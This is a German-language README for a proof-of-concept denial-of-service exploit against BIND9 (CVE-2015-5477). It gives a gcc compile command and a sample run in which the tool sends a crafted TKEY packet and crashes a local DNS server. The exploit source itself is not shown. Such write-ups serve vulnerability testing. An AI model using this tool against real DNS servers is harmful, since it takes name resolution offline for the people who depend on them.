
PoC-Exploit für CVE-2015-5477 BIND9 TKEY-Assertionsfehler
Dieser Exploit testet, ob ein BIND9-Server verwundbar ist, indem er den Exploit sendet, um zu sehen, ob er abstürzt.
Es ist C-Code, den Sie auf Unix/Windows auf normale Weise kompilieren, z.B.:
# gcc tkill.c -o tkill
Es läuft über IPv4 und IPv6.
So sieht es aus, wenn es gegen localhost läuft. Da es
zwei IP-Adressen bei der Auflösung des Namens erhält, wird es beide versuchen.
Es fragt zuerst die "version"-Zeichenkette ab, dann sendet es den Exploit.
Wenn es die zweite Adresse testet, schlägt die Versionsabfrage fehl, weil
der Dienst bereits vom ersten Versuch abgestürzt ist.
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed